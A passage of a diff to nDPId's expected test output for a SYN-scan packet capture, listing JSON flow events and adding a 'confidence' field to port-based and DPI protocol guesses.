 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6838,20 +6838,20 @@
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","ndpi": {"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}}
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","ndpi": {"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}}
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
@@ -6982,17 +6982,17 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00599{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00599{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
